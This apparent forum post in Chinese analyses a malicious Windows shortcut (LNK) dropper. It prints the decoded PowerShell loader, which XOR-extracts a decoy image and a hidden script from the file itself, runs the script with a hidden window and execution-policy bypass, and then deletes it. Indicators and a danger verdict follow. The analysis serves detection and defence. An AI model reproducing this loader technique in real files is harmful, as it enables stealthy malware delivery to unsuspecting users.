完整解码了隐藏的 PowerShell 载荷。这是一个精心构造的恶意快捷方式文件。
攻击链分析
用户双击"文件夹" → 隐藏PowerShell启动 → 从LNK自身提取两个载荷 → 显示诱饵图片 → 后台执行恶意脚本 → 自删除痕迹
解码后的恶意脚本:
powershell
# 1. 定位自身 LNK 文件
$eYW = Join-Path $Fie ('1633102209575.jpg.lnk');
# 2. XOR解密提取函数 — 从LNK文件体内嵌入的二进制数据中提取载荷
function pl {
param($DF, $Cm, $mix, $Yim)
# 从LNK文件指定偏移读取字节 → XOR解密 → 写入文件
$adz[$Ci3] = $adz[$Ci3] -bxor $mix;
}
# 3. 载荷A: 诱饵图片 (迷惑受害者)
# 偏移8192, 大小23198字节, XOR密钥250
pl 8192 23198 250 "$TEMP\1633102209575.jpg"
Start-Process -FilePath $pK; # 打开图片给用户看
# 4. 载荷B: 真正的恶意脚本 (隐藏执行)
# 偏移31390, 大小12394字节, XOR密钥138
pl 31390 12394 138 "$TEMP\<随机文件名>.ps1"
powershell -noprofile -windowstyle hidden -executionpolicy bypass -file $ZI;
# 5. 自删除 — 消除痕迹
Remove-Item -Path $ZI -Force;
恶意特征汇总
指标 详情
文件类型 Windows 快捷方式 (.lnk)
大小 43,784 字节 (正常 LNK 约 1-2KB,异常膨大)
图标伪装 SHELL32.dll,70 — 伪装成文件夹图标
执行方式 powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
载荷隐藏 两段 XOR 加密数据嵌入 LNK 文件尾部
载荷A 诱饵 JPG 图片 (偏移 8192, 23KB) — 迷惑受害者
载荷B 恶意 PS1 脚本 (偏移 31390, 12KB) — 真实木马
反取证 执行后自动删除恶意 PS1 文件
变量混淆 使用随机变量名 + 大小写混淆 (如 rECURSE, SILeNtLyConTinuE)
判定
⛔ 危险等级: Critical (100分)
这是一个典型的 LNK 钓鱼木马投放器,常见于银狐/SilverFox、QakBot 等攻击活动。攻击流程:
伪装成文件夹引诱双击
隐藏启动 PowerShell 绕过执行策略
从自身提取 XOR 加密的诱饵图片 + 恶意脚本
展示诱饵图片让受害者以为打开了正常文件
后台静默执行真正的恶意载荷
自动删除痕迹
建议: 立即删除该文件,不要双击运行。检查系统是否已被感染。
发表于 
